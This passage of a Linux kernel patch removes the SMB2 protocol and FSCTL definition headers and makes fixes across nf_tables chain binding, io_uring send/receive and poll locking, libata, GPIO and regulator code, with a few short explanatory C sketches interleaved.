+-
+-struct smb2_fs_full_size_info {
+-	__le64 TotalAllocationUnits;
+-	__le64 CallerAvailableAllocationUnits;
+-	__le64 ActualAvailableAllocationUnits;
+-	__le32 SectorsPerAllocationUnit;
+-	__le32 BytesPerSector;
+-} __packed;
+-
+-#define SSINFO_FLAGS_ALIGNED_DEVICE		0x00000001
+-#define SSINFO_FLAGS_PARTITION_ALIGNED_ON_DEVICE 0x00000002
+-#define SSINFO_FLAGS_NO_SEEK_PENALTY		0x00000004
+-#define SSINFO_FLAGS_TRIM_ENABLED		0x00000008
+-
+-/* sector size info struct */
+-struct smb3_fs_ss_info {
+-	__le32 LogicalBytesPerSector;
+-	__le32 PhysicalBytesPerSectorForAtomicity;
+-	__le32 PhysicalBytesPerSectorForPerf;
+-	__le32 FSEffPhysicalBytesPerSectorForAtomicity;
+-	__le32 Flags;
+-	__le32 ByteOffsetForSectorAlignment;
+-	__le32 ByteOffsetForPartitionAlignment;
+-} __packed;
+-
+-/* File System Control Information */
+-struct smb2_fs_control_info {
+-	__le64 FreeSpaceStartFiltering;
+-	__le64 FreeSpaceThreshold;
+-	__le64 FreeSpaceStopFiltering;
+-	__le64 DefaultQuotaThreshold;
+-	__le64 DefaultQuotaLimit;
+-	__le32 FileSystemControlFlags;
+-	__le32 Padding;
+-} __packed;
+-
+-/* volume info struct - see MS-FSCC 2.5.9 */
+-#define MAX_VOL_LABEL_LEN	32
+-struct smb3_fs_vol_info {
+-	__le64	VolumeCreationTime;
+-	__u32	VolumeSerialNumber;
+-	__le32	VolumeLabelLength; /* includes trailing null */
+-	__u8	SupportsObjects; /* True if, like NTFS, the fs supports objects */
+-	__u8	Reserved;
+-	__u8	VolumeLabel[]; /* variable len */
+-} __packed;
+-
+-/* See MS-SMB2 2.2.23 through 2.2.25 */
+-struct smb2_oplock_break {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 24 */
+-	__u8   OplockLevel;
+-	__u8   Reserved;
+-	__le32 Reserved2;
+-	__u64  PersistentFid;
+-	__u64  VolatileFid;
+-} __packed;
+-
+-#define SMB2_NOTIFY_BREAK_LEASE_FLAG_ACK_REQUIRED cpu_to_le32(0x01)
+-
+-struct smb2_lease_break {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 44 */
+-	__le16 Epoch;
+-	__le32 Flags;
+-	__u8   LeaseKey[16];
+-	__le32 CurrentLeaseState;
+-	__le32 NewLeaseState;
+-	__le32 BreakReason;
+-	__le32 AccessMaskHint;
+-	__le32 ShareMaskHint;
+-} __packed;
+-
+-struct smb2_lease_ack {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 36 */
+-	__le16 Reserved;
+-	__le32 Flags;
+-	__u8   LeaseKey[16];
+-	__le32 LeaseState;
+-	__le64 LeaseDuration;
+-} __packed;
+-
+-#define OP_BREAK_STRUCT_SIZE_20		24
+-#define OP_BREAK_STRUCT_SIZE_21		36
+-#endif				/* _COMMON_SMB2PDU_H */
+diff --git a/fs/smbfs_common/smbfsctl.h b/fs/smbfs_common/smbfsctl.h
+deleted file mode 100644
+index edd7fc2a7921b..0000000000000
+--- a/fs/smbfs_common/smbfsctl.h
++++ /dev/null
+@@ -1,170 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1+ */
+-/*
+- *   SMB, CIFS, SMB2 FSCTL definitions
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002,2013
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-/* IOCTL information */
+-/*
+- * List of ioctl/fsctl function codes that are or could be useful in the
+- * future to remote clients like the cifs or SMB2/SMB3 clients.  This is
+- * probably a slightly larger set of fsctls than the NTFS local filesystem
+- * could handle,
+- * including the seven below that we do not have struct definitions for.
+- * Even with protocol definitions for most of these now available, we still
+- * need to do some experimentation to identify which are practical to do
+- * remotely.  Some of the following, such as the encryption/compression ones
+- * could be invoked from tools via a specialized hook into the VFS rather
+- * than via the standard vfs entry points
+- *
+- * See MS-SMB2 Section 2.2.31 (last checked September 2021, all of that list are
+- * below). Additional detail on less common ones can be found in MS-FSCC
+- * section 2.3.
+- */
+-
+-#ifndef __SMBFSCTL_H
+-#define __SMBFSCTL_H
+-
+-/*
+- * FSCTL values are 32 bits and are constructed as
+- * <device 16bits> <access 2bits> <function 12bits> <method 2bits>
+- */
+-/* Device */
+-#define FSCTL_DEVICE_DFS                 (0x0006 << 16)
+-#define FSCTL_DEVICE_FILE_SYSTEM         (0x0009 << 16)
+-#define FSCTL_DEVICE_NAMED_PIPE          (0x0011 << 16)
+-#define FSCTL_DEVICE_NETWORK_FILE_SYSTEM (0x0014 << 16)
+-#define FSCTL_DEVICE_MASK                0xffff0000
+-/* Access */
+-#define FSCTL_DEVICE_ACCESS_FILE_ANY_ACCESS        (0x00 << 14)
+-#define FSCTL_DEVICE_ACCESS_FILE_READ_ACCESS       (0x01 << 14)
+-#define FSCTL_DEVICE_ACCESS_FILE_WRITE_ACCESS      (0x02 << 14)
+-#define FSCTL_DEVICE_ACCESS_FILE_READ_WRITE_ACCESS (0x03 << 14)
+-#define FSCTL_DEVICE_ACCESS_MASK                   0x0000c000
+-/* Function */
+-#define FSCTL_DEVICE_FUNCTION_MASK       0x00003ffc
+-/* Method */
+-#define FSCTL_DEVICE_METHOD_BUFFERED   0x00
+-#define FSCTL_DEVICE_METHOD_IN_DIRECT  0x01
+-#define FSCTL_DEVICE_METHOD_OUT_DIRECT 0x02
+-#define FSCTL_DEVICE_METHOD_NEITHER    0x03
+-#define FSCTL_DEVICE_METHOD_MASK       0x00000003
+-
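
The masks above pick the four fields back out of a code; a small illustrative decoder, not part of this patch:

	static void fsctl_decode(u32 code, u16 *device, u8 *access,
				 u16 *function, u8 *method)
	{
		*device   = (code & FSCTL_DEVICE_MASK) >> 16;
		*access   = (code & FSCTL_DEVICE_ACCESS_MASK) >> 14;
		*function = (code & FSCTL_DEVICE_FUNCTION_MASK) >> 2;
		*method   = code & FSCTL_DEVICE_METHOD_MASK;
	}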
+-
+-#define FSCTL_DFS_GET_REFERRALS      0x00060194
+-#define FSCTL_DFS_GET_REFERRALS_EX   0x000601B0
+-#define FSCTL_REQUEST_OPLOCK_LEVEL_1 0x00090000
+-#define FSCTL_REQUEST_OPLOCK_LEVEL_2 0x00090004
+-#define FSCTL_REQUEST_BATCH_OPLOCK   0x00090008
+-#define FSCTL_LOCK_VOLUME            0x00090018
+-#define FSCTL_UNLOCK_VOLUME          0x0009001C
+-#define FSCTL_IS_PATHNAME_VALID      0x0009002C /* BB add struct */
+-#define FSCTL_GET_COMPRESSION        0x0009003C /* BB add struct */
+-#define FSCTL_SET_COMPRESSION        0x0009C040 /* BB add struct */
+-#define FSCTL_QUERY_FAT_BPB          0x00090058 /* BB add struct */
+-/* Verify the next FSCTL number; we had it as 0x00090090 before */
+-#define FSCTL_FILESYSTEM_GET_STATS   0x00090060 /* BB add struct */
+-#define FSCTL_GET_NTFS_VOLUME_DATA   0x00090064 /* BB add struct */
+-#define FSCTL_GET_RETRIEVAL_POINTERS 0x00090073 /* BB add struct */
+-#define FSCTL_IS_VOLUME_DIRTY        0x00090078 /* BB add struct */
+-#define FSCTL_ALLOW_EXTENDED_DASD_IO 0x00090083 /* BB add struct */
+-#define FSCTL_REQUEST_FILTER_OPLOCK  0x0009008C
+-#define FSCTL_FIND_FILES_BY_SID      0x0009008F /* BB add struct */
+-#define FSCTL_SET_OBJECT_ID          0x00090098 /* BB add struct */
+-#define FSCTL_GET_OBJECT_ID          0x0009009C /* BB add struct */
+-#define FSCTL_DELETE_OBJECT_ID       0x000900A0 /* BB add struct */
+-#define FSCTL_SET_REPARSE_POINT      0x000900A4 /* BB add struct */
+-#define FSCTL_GET_REPARSE_POINT      0x000900A8 /* BB add struct */
+-#define FSCTL_DELETE_REPARSE_POINT   0x000900AC /* BB add struct */
+-#define FSCTL_SET_OBJECT_ID_EXTENDED 0x000900BC /* BB add struct */
+-#define FSCTL_CREATE_OR_GET_OBJECT_ID 0x000900C0 /* BB add struct */
+-#define FSCTL_SET_SPARSE             0x000900C4 /* BB add struct */
+-#define FSCTL_SET_ZERO_DATA          0x000980C8
+-#define FSCTL_SET_ENCRYPTION         0x000900D7 /* BB add struct */
+-#define FSCTL_ENCRYPTION_FSCTL_IO    0x000900DB /* BB add struct */
+-#define FSCTL_WRITE_RAW_ENCRYPTED    0x000900DF /* BB add struct */
+-#define FSCTL_READ_RAW_ENCRYPTED     0x000900E3 /* BB add struct */
+-#define FSCTL_READ_FILE_USN_DATA     0x000900EB /* BB add struct */
+-#define FSCTL_WRITE_USN_CLOSE_RECORD 0x000900EF /* BB add struct */
+-#define FSCTL_MARK_HANDLE	     0x000900FC /* BB add struct */
+-#define FSCTL_SIS_COPYFILE           0x00090100 /* BB add struct */
+-#define FSCTL_RECALL_FILE            0x00090117 /* BB add struct */
+-#define FSCTL_QUERY_SPARING_INFO     0x00090138 /* BB add struct */
+-#define FSCTL_QUERY_ON_DISK_VOLUME_INFO 0x0009013C
+-#define FSCTL_SET_ZERO_ON_DEALLOC    0x00090194 /* BB add struct */
+-#define FSCTL_SET_SHORT_NAME_BEHAVIOR 0x000901B4 /* BB add struct */
+-#define FSCTL_GET_INTEGRITY_INFORMATION 0x0009027C
+-#define FSCTL_QUERY_FILE_REGIONS     0x00090284
+-#define FSCTL_GET_REFS_VOLUME_DATA   0x000902D8 /* See MS-FSCC 2.3.24 */
+-#define FSCTL_SET_INTEGRITY_INFORMATION_EXT 0x00090380
+-#define FSCTL_GET_RETRIEVAL_POINTERS_AND_REFCOUNT 0x000903d3
+-#define FSCTL_GET_RETRIEVAL_POINTER_COUNT 0x0009042b
+-#define FSCTL_REFS_STREAM_SNAPSHOT_MANAGEMENT 0x00090440
+-#define FSCTL_QUERY_ALLOCATED_RANGES 0x000940CF
+-#define FSCTL_OFFLOAD_READ	0x00094264 /* BB add struct */
+-#define FSCTL_OFFLOAD_WRITE	0x00098268 /* BB add struct */
+-#define FSCTL_SET_DEFECT_MANAGEMENT  0x00098134 /* BB add struct */
+-#define FSCTL_FILE_LEVEL_TRIM        0x00098208 /* BB add struct */
+-#define FSCTL_DUPLICATE_EXTENTS_TO_FILE 0x00098344
+-#define FSCTL_DUPLICATE_EXTENTS_TO_FILE_EX 0x000983E8
+-#define FSCTL_SIS_LINK_FILES         0x0009C104
+-#define FSCTL_SET_INTEGRITY_INFORMATION 0x0009C280
+-#define FSCTL_PIPE_PEEK              0x0011400C /* BB add struct */
+-#define FSCTL_PIPE_TRANSCEIVE        0x0011C017 /* BB add struct */
+-/* strange that the number for this op is not sequential with previous op */
+-#define FSCTL_PIPE_WAIT              0x00110018 /* BB add struct */
+-/* Enumerate previous versions of a file */
+-#define FSCTL_SRV_ENUMERATE_SNAPSHOTS 0x00144064
+-/* Retrieve an opaque file reference for server-side data movement, i.e. copy */
+-#define FSCTL_SRV_REQUEST_RESUME_KEY 0x00140078
+-#define FSCTL_LMR_REQUEST_RESILIENCY 0x001401D4
+-#define FSCTL_LMR_GET_LINK_TRACK_INF 0x001400E8 /* BB add struct */
+-#define FSCTL_LMR_SET_LINK_TRACK_INF 0x001400EC /* BB add struct */
+-#define FSCTL_VALIDATE_NEGOTIATE_INFO 0x00140204
+-/* Perform server-side data movement */
+-#define FSCTL_SRV_COPYCHUNK 0x001440F2
+-#define FSCTL_SRV_COPYCHUNK_WRITE 0x001480F2
+-#define FSCTL_QUERY_NETWORK_INTERFACE_INFO 0x001401FC /* BB add struct */
+-#define FSCTL_SRV_READ_HASH          0x001441BB /* BB add struct */
+-
+-/* See FSCC 2.1.2.5 */
+-#define IO_REPARSE_TAG_MOUNT_POINT   0xA0000003
+-#define IO_REPARSE_TAG_HSM           0xC0000004
+-#define IO_REPARSE_TAG_SIS           0x80000007
+-#define IO_REPARSE_TAG_HSM2          0x80000006
+-#define IO_REPARSE_TAG_DRIVER_EXTENDER 0x80000005
+-/* Used by the DFS filter. See MS-DFSC */
+-#define IO_REPARSE_TAG_DFS           0x8000000A
+-/* Used by the DFS filter See MS-DFSC */
+-#define IO_REPARSE_TAG_DFSR          0x80000012
+-#define IO_REPARSE_TAG_FILTER_MANAGER 0x8000000B
+-/* See section MS-FSCC 2.1.2.4 */
+-#define IO_REPARSE_TAG_SYMLINK       0xA000000C
+-#define IO_REPARSE_TAG_DEDUP         0x80000013
+-#define IO_REPARSE_APPXSTREAM	     0xC0000014
+-/* NFS symlinks, Win 8/SMB3 and later */
+-#define IO_REPARSE_TAG_NFS           0x80000014
+-/*
+- * AzureFileSync - see
+- * https://docs.microsoft.com/en-us/azure/storage/files/storage-sync-cloud-tiering
+- */
+-#define IO_REPARSE_TAG_AZ_FILE_SYNC  0x8000001e
+-/* WSL reparse tags */
+-#define IO_REPARSE_TAG_LX_SYMLINK    0xA000001D
+-#define IO_REPARSE_TAG_AF_UNIX	     0x80000023
+-#define IO_REPARSE_TAG_LX_FIFO	     0x80000024
+-#define IO_REPARSE_TAG_LX_CHR	     0x80000025
+-#define IO_REPARSE_TAG_LX_BLK	     0x80000026
+-
+-#define IO_REPARSE_TAG_LX_SYMLINK_LE	cpu_to_le32(0xA000001D)
+-#define IO_REPARSE_TAG_AF_UNIX_LE	cpu_to_le32(0x80000023)
+-#define IO_REPARSE_TAG_LX_FIFO_LE	cpu_to_le32(0x80000024)
+-#define IO_REPARSE_TAG_LX_CHR_LE	cpu_to_le32(0x80000025)
+-#define IO_REPARSE_TAG_LX_BLK_LE	cpu_to_le32(0x80000026)
+-
+-/* fsctl flags */
+-/* If Flags is set to this value, the request is an FSCTL not ioctl request */
+-#define SMB2_0_IOCTL_IS_FSCTL		0x00000001
+-#endif /* __SMBFSCTL_H */
+diff --git a/include/acpi/acpixf.h b/include/acpi/acpixf.h
+index 67c0b9e734b64..911bab2998e22 100644
+--- a/include/acpi/acpixf.h
++++ b/include/acpi/acpixf.h
+@@ -751,6 +751,7 @@ ACPI_HW_DEPENDENT_RETURN_STATUS(acpi_status
+ 						     acpi_event_status
+ 						     *event_status))
+ ACPI_HW_DEPENDENT_RETURN_UINT32(u32 acpi_dispatch_gpe(acpi_handle gpe_device, u32 gpe_number))
++ACPI_HW_DEPENDENT_RETURN_STATUS(acpi_status acpi_hw_disable_all_gpes(void))
+ ACPI_HW_DEPENDENT_RETURN_STATUS(acpi_status acpi_disable_all_gpes(void))
+ ACPI_HW_DEPENDENT_RETURN_STATUS(acpi_status acpi_enable_all_runtime_gpes(void))
+ ACPI_HW_DEPENDENT_RETURN_STATUS(acpi_status acpi_enable_all_wakeup_gpes(void))
+diff --git a/include/acpi/actbl3.h b/include/acpi/actbl3.h
+index 7b9571e00cc4b..832c6464f063f 100644
+--- a/include/acpi/actbl3.h
++++ b/include/acpi/actbl3.h
+@@ -443,6 +443,7 @@ struct acpi_tpm2_phy {
+ #define ACPI_TPM2_RESERVED10                        10
+ #define ACPI_TPM2_COMMAND_BUFFER_WITH_ARM_SMC       11	/* V1.2 Rev 8 */
+ #define ACPI_TPM2_RESERVED                          12
++#define ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON        13
+ 
+ /* Optional trailer appears after any start_method subtables */
+ 
+diff --git a/include/linux/gpio/driver.h b/include/linux/gpio/driver.h
+index 6aeea1071b1b2..78bcb1639999e 100644
+--- a/include/linux/gpio/driver.h
++++ b/include/linux/gpio/driver.h
+@@ -244,6 +244,14 @@ struct gpio_irq_chip {
+ 	 */
+ 	bool initialized;
+ 
++	/**
++	 * @domain_is_allocated_externally:
++	 *
++	 * True if the irq_domain was allocated outside of gpiolib, in which
++	 * case gpiolib won't free the irq_domain itself.
++	 */
++	bool domain_is_allocated_externally;
++
+ 	/**
+ 	 * @init_hw: optional routine to initialize hardware before
+ 	 * an IRQ chip will be added. This is quite useful when
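
A driver that builds its own irq_domain would opt out of gpiolib's teardown with the new flag, roughly as in this hypothetical sketch:

	static void wire_external_domain(struct gpio_irq_chip *girq,
					 struct irq_domain *domain)
	{
		girq->domain = domain;	/* allocated outside gpiolib */
		/* tell gpiolib not to free the domain on chip removal */
		girq->domain_is_allocated_externally = true;
	}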
+diff --git a/include/linux/libata.h b/include/linux/libata.h
+index fe990176e6ee9..9713f4d8f15f4 100644
+--- a/include/linux/libata.h
++++ b/include/linux/libata.h
+@@ -834,7 +834,7 @@ struct ata_port {
+ 
+ 	struct mutex		scsi_scan_mutex;
+ 	struct delayed_work	hotplug_task;
+-	struct work_struct	scsi_rescan_task;
++	struct delayed_work	scsi_rescan_task;
+ 
+ 	unsigned int		hsm_task_state;
+ 
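
With scsi_rescan_task now a delayed_work, the matching call-site updates (not shown in this hunk) would look roughly like the sketch below:

	INIT_DELAYED_WORK(&ap->scsi_rescan_task, ata_scsi_dev_rescan);	/* was INIT_WORK() */
	schedule_delayed_work(&ap->scsi_rescan_task, 0);	/* was schedule_work() */
	cancel_delayed_work_sync(&ap->scsi_rescan_task);	/* was cancel_work_sync() */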
+diff --git a/include/linux/regulator/pca9450.h b/include/linux/regulator/pca9450.h
+index 3c01c2bf84f53..505c908dbb817 100644
+--- a/include/linux/regulator/pca9450.h
++++ b/include/linux/regulator/pca9450.h
+@@ -196,11 +196,11 @@ enum {
+ 
+ /* PCA9450_REG_LDO3_VOLT bits */
+ #define LDO3_EN_MASK			0xC0
+-#define LDO3OUT_MASK			0x0F
++#define LDO3OUT_MASK			0x1F
+ 
+ /* PCA9450_REG_LDO4_VOLT bits */
+ #define LDO4_EN_MASK			0xC0
+-#define LDO4OUT_MASK			0x0F
++#define LDO4OUT_MASK			0x1F
+ 
+ /* PCA9450_REG_LDO5_VOLT bits */
+ #define LDO5L_EN_MASK			0xC0
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index 22e96b7e1b44a..f3a37cacb32c3 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -467,7 +467,8 @@ struct nft_set_ops {
+ 	int				(*init)(const struct nft_set *set,
+ 						const struct nft_set_desc *desc,
+ 						const struct nlattr * const nla[]);
+-	void				(*destroy)(const struct nft_set *set);
++	void				(*destroy)(const struct nft_ctx *ctx,
++						   const struct nft_set *set);
+ 	void				(*gc_init)(const struct nft_set *set);
+ 
+ 	unsigned int			elemsize;
+@@ -804,6 +805,8 @@ int nft_set_elem_expr_clone(const struct nft_ctx *ctx, struct nft_set *set,
+ 			    struct nft_expr *expr_array[]);
+ void nft_set_elem_destroy(const struct nft_set *set, void *elem,
+ 			  bool destroy_expr);
++void nf_tables_set_elem_destroy(const struct nft_ctx *ctx,
++				const struct nft_set *set, void *elem);
+ 
+ /**
+  *	struct nft_set_gc_batch_head - nf_tables set garbage collection batch
+@@ -895,6 +898,7 @@ struct nft_expr_type {
+ 
+ enum nft_trans_phase {
+ 	NFT_TRANS_PREPARE,
++	NFT_TRANS_PREPARE_ERROR,
+ 	NFT_TRANS_ABORT,
+ 	NFT_TRANS_COMMIT,
+ 	NFT_TRANS_RELEASE
+@@ -1002,7 +1006,10 @@ static inline struct nft_userdata *nft_userdata(const struct nft_rule *rule)
+ 	return (void *)&rule->data[rule->dlen];
+ }
+ 
+-void nf_tables_rule_release(const struct nft_ctx *ctx, struct nft_rule *rule);
++void nft_rule_expr_activate(const struct nft_ctx *ctx, struct nft_rule *rule);
++void nft_rule_expr_deactivate(const struct nft_ctx *ctx, struct nft_rule *rule,
++			      enum nft_trans_phase phase);
++void nf_tables_rule_destroy(const struct nft_ctx *ctx, struct nft_rule *rule);
+ 
+ static inline void nft_set_elem_update_expr(const struct nft_set_ext *ext,
+ 					    struct nft_regs *regs,
+@@ -1085,6 +1092,8 @@ int nft_setelem_validate(const struct nft_ctx *ctx, struct nft_set *set,
+ 			 const struct nft_set_iter *iter,
+ 			 struct nft_set_elem *elem);
+ int nft_set_catchall_validate(const struct nft_ctx *ctx, struct nft_set *set);
++int nf_tables_bind_chain(const struct nft_ctx *ctx, struct nft_chain *chain);
++void nf_tables_unbind_chain(const struct nft_ctx *ctx, struct nft_chain *chain);
+ 
+ enum nft_chain_types {
+ 	NFT_CHAIN_T_DEFAULT = 0,
+@@ -1121,11 +1130,17 @@ int nft_chain_validate_dependency(const struct nft_chain *chain,
+ int nft_chain_validate_hooks(const struct nft_chain *chain,
+                              unsigned int hook_flags);
+ 
++static inline bool nft_chain_binding(const struct nft_chain *chain)
++{
++	return chain->flags & NFT_CHAIN_BINDING;
++}
++
+ static inline bool nft_chain_is_bound(struct nft_chain *chain)
+ {
+ 	return (chain->flags & NFT_CHAIN_BINDING) && chain->bound;
+ }
+ 
++int nft_chain_add(struct nft_table *table, struct nft_chain *chain);
+ void nft_chain_del(struct nft_chain *chain);
+ void nf_tables_chain_destroy(struct nft_ctx *ctx);
+ 
+@@ -1543,6 +1558,7 @@ static inline void nft_set_elem_clear_busy(struct nft_set_ext *ext)
+  *	struct nft_trans - nf_tables object update in transaction
+  *
+  *	@list: used internally
++ *	@binding_list: list of objects with possible bindings
+  *	@msg_type: message type
+  *	@put_net: ctx->net needs to be put
+  *	@ctx: transaction context
+@@ -1550,6 +1566,7 @@ static inline void nft_set_elem_clear_busy(struct nft_set_ext *ext)
+  */
+ struct nft_trans {
+ 	struct list_head		list;
++	struct list_head		binding_list;
+ 	int				msg_type;
+ 	bool				put_net;
+ 	struct nft_ctx			ctx;
+@@ -1560,6 +1577,7 @@ struct nft_trans_rule {
+ 	struct nft_rule			*rule;
+ 	struct nft_flow_rule		*flow;
+ 	u32				rule_id;
++	bool				bound;
+ };
+ 
+ #define nft_trans_rule(trans)	\
+@@ -1568,6 +1586,8 @@ struct nft_trans_rule {
+ 	(((struct nft_trans_rule *)trans->data)->flow)
+ #define nft_trans_rule_id(trans)	\
+ 	(((struct nft_trans_rule *)trans->data)->rule_id)
++#define nft_trans_rule_bound(trans)	\
++	(((struct nft_trans_rule *)trans->data)->bound)
+ 
+ struct nft_trans_set {
+ 	struct nft_set			*set;
+@@ -1592,13 +1612,17 @@ struct nft_trans_set {
+ 	(((struct nft_trans_set *)trans->data)->gc_int)
+ 
+ struct nft_trans_chain {
++	struct nft_chain		*chain;
+ 	bool				update;
+ 	char				*name;
+ 	struct nft_stats __percpu	*stats;
+ 	u8				policy;
++	bool				bound;
+ 	u32				chain_id;
+ };
+ 
++#define nft_trans_chain(trans)	\
++	(((struct nft_trans_chain *)trans->data)->chain)
+ #define nft_trans_chain_update(trans)	\
+ 	(((struct nft_trans_chain *)trans->data)->update)
+ #define nft_trans_chain_name(trans)	\
+@@ -1607,6 +1631,8 @@ struct nft_trans_chain {
+ 	(((struct nft_trans_chain *)trans->data)->stats)
+ #define nft_trans_chain_policy(trans)	\
+ 	(((struct nft_trans_chain *)trans->data)->policy)
++#define nft_trans_chain_bound(trans)	\
++	(((struct nft_trans_chain *)trans->data)->bound)
+ #define nft_trans_chain_id(trans)	\
+ 	(((struct nft_trans_chain *)trans->data)->chain_id)
+ 
+@@ -1679,6 +1705,7 @@ static inline int nft_request_module(struct net *net, const char *fmt, ...) { re
+ struct nftables_pernet {
+ 	struct list_head	tables;
+ 	struct list_head	commit_list;
++	struct list_head	binding_list;
+ 	struct list_head	module_list;
+ 	struct list_head	notify_list;
+ 	struct mutex		commit_mutex;
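
A set backend implementing the widened ->destroy() hook now receives the transaction context; a hedged sketch with a made-up backend name:

	static void nft_example_destroy(const struct nft_ctx *ctx,
					const struct nft_set *set)
	{
		/* per-element teardown can now go through
		 * nf_tables_set_elem_destroy(ctx, set, elem) */
	}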
+diff --git a/include/net/xfrm.h b/include/net/xfrm.h
+index dbc81f5eb5538..9ec6f2e92ad3a 100644
+--- a/include/net/xfrm.h
++++ b/include/net/xfrm.h
+@@ -1039,6 +1039,7 @@ struct xfrm_offload {
+ struct sec_path {
+ 	int			len;
+ 	int			olen;
++	int			verified_cnt;
+ 
+ 	struct xfrm_state	*xvec[XFRM_MAX_DEPTH];
+ 	struct xfrm_offload	ovec[XFRM_MAX_OFFLOAD_DEPTH];
+diff --git a/include/trace/events/writeback.h b/include/trace/events/writeback.h
+index 86b2a82da546a..54e353c9f919f 100644
+--- a/include/trace/events/writeback.h
++++ b/include/trace/events/writeback.h
+@@ -68,7 +68,7 @@ DECLARE_EVENT_CLASS(writeback_folio_template,
+ 		strscpy_pad(__entry->name,
+ 			    bdi_dev_name(mapping ? inode_to_bdi(mapping->host) :
+ 					 NULL), 32);
+-		__entry->ino = mapping ? mapping->host->i_ino : 0;
++		__entry->ino = (mapping && mapping->host) ? mapping->host->i_ino : 0;
+ 		__entry->index = folio->index;
+ 	),
+ 
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 05792a6899944..2b44126a876ef 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -190,7 +190,7 @@ static int io_sendmsg_copy_hdr(struct io_kiocb *req,
+ 	ret = sendmsg_copy_msghdr(&iomsg->msg, sr->umsg, sr->msg_flags,
+ 					&iomsg->free_iov);
+ 	/* save msg_control as sys_sendmsg() overwrites it */
+-	sr->msg_control = iomsg->msg.msg_control;
++	sr->msg_control = iomsg->msg.msg_control_user;
+ 	return ret;
+ }
+ 
+@@ -289,7 +289,7 @@ int io_sendmsg(struct io_kiocb *req, unsigned int issue_flags)
+ 
+ 	if (req_has_async_data(req)) {
+ 		kmsg = req->async_data;
+-		kmsg->msg.msg_control = sr->msg_control;
++		kmsg->msg.msg_control_user = sr->msg_control;
+ 	} else {
+ 		ret = io_sendmsg_copy_hdr(req, &iomsg);
+ 		if (ret)
+@@ -313,6 +313,8 @@ int io_sendmsg(struct io_kiocb *req, unsigned int issue_flags)
+ 		if (ret == -EAGAIN && (issue_flags & IO_URING_F_NONBLOCK))
+ 			return io_setup_async_msg(req, kmsg, issue_flags);
+ 		if (ret > 0 && io_net_retry(sock, flags)) {
++			kmsg->msg.msg_controllen = 0;
++			kmsg->msg.msg_control = NULL;
+ 			sr->done_io += ret;
+ 			req->flags |= REQ_F_PARTIAL_IO;
+ 			return io_setup_async_msg(req, kmsg, issue_flags);
+@@ -779,16 +781,19 @@ retry_multishot:
+ 	flags = sr->msg_flags;
+ 	if (force_nonblock)
+ 		flags |= MSG_DONTWAIT;
+-	if (flags & MSG_WAITALL)
+-		min_ret = iov_iter_count(&kmsg->msg.msg_iter);
+ 
+ 	kmsg->msg.msg_get_inq = 1;
+-	if (req->flags & REQ_F_APOLL_MULTISHOT)
++	if (req->flags & REQ_F_APOLL_MULTISHOT) {
+ 		ret = io_recvmsg_multishot(sock, sr, kmsg, flags,
+ 					   &mshot_finished);
+-	else
++	} else {
++		/* disable partial retry for recvmsg with cmsg attached */
++		if (flags & MSG_WAITALL && !kmsg->msg.msg_controllen)
++			min_ret = iov_iter_count(&kmsg->msg.msg_iter);
++
+ 		ret = __sys_recvmsg_sock(sock, &kmsg->msg, sr->umsg,
+ 					 kmsg->uaddr, flags);
++	}
+ 
+ 	if (ret < min_ret) {
+ 		if (ret == -EAGAIN && force_nonblock) {
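
For context, the recvmsg shape the MSG_WAITALL tweak above targets pairs a data buffer with ancillary (cmsg) space; a userspace sketch under those assumptions:

	#include <sys/socket.h>

	static ssize_t recv_with_cmsg(int fd, void *buf, size_t len)
	{
		char cbuf[CMSG_SPACE(sizeof(int))];
		struct iovec iov = { .iov_base = buf, .iov_len = len };
		struct msghdr msg = {
			.msg_iov        = &iov,
			.msg_iovlen     = 1,
			/* non-zero msg_controllen is what disables the
			 * short-read retry in the hunk above */
			.msg_control    = cbuf,
			.msg_controllen = sizeof(cbuf),
		};

		return recvmsg(fd, &msg, MSG_WAITALL);
	}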
+diff --git a/io_uring/poll.c b/io_uring/poll.c
+index 4788073ec45d2..869e1d2a44139 100644
+--- a/io_uring/poll.c
++++ b/io_uring/poll.c
+@@ -993,8 +993,9 @@ int io_poll_remove(struct io_kiocb *req, unsigned int issue_flags)
+ 	struct io_hash_bucket *bucket;
+ 	struct io_kiocb *preq;
+ 	int ret2, ret = 0;
+-	bool locked;
++	bool locked = true;
+ 
++	io_ring_submit_lock(ctx, issue_flags);
+ 	preq = io_poll_find(ctx, true, &cd, &ctx->cancel_table, &bucket);
+ 	ret2 = io_poll_disarm(preq);
+ 	if (bucket)
+@@ -1006,12 +1007,10 @@ int io_poll_remove(struct io_kiocb *req, unsigned int issue_flags)
+ 		goto out;
+ 	}
+ 
+-	io_ring_submit_lock(ctx, issue_flags);
+ 	preq = io_poll_find(ctx, true, &cd, &ctx->cancel_table_locked, &bucket);
+ 	ret2 = io_poll_disarm(preq);
+ 	if (bucket)
+ 		spin_unlock(&bucket->lock);
+-	io_ring_submit_unlock(ctx, issue_flags);
+ 	if (ret2) {
+ 		ret = ret2;
+ 		goto out;
+@@ -1035,7 +1034,7 @@ found:
+ 		if (poll_update->update_user_data)
+ 			preq->cqe.user_data = poll_update->new_user_data;
+ 
+-		ret2 = io_poll_add(preq, issue_flags);
++		ret2 = io_poll_add(preq, issue_flags & ~IO_URING_F_UNLOCKED);
+ 		/* successfully updated, don't complete poll request */
+ 		if (!ret2 || ret2 == -EIOCBQUEUED)
+ 			goto out;
+@@ -1043,9 +1042,9 @@ found:
+ 
+ 	req_set_fail(preq);
+ 	io_req_set_res(preq, -ECANCELED, 0);
+-	locked = !(issue_flags & IO_URING_F_UNLOCKED);
+ 	io_req_task_complete(preq, &locked);
+ out:
++	io_ring_submit_unlock(ctx, issue_flags);
+ 	if (ret < 0) {
+ 		req_set_fail(req);
+ 		return ret;
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index a8838a32f750e..8220caa488c54 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
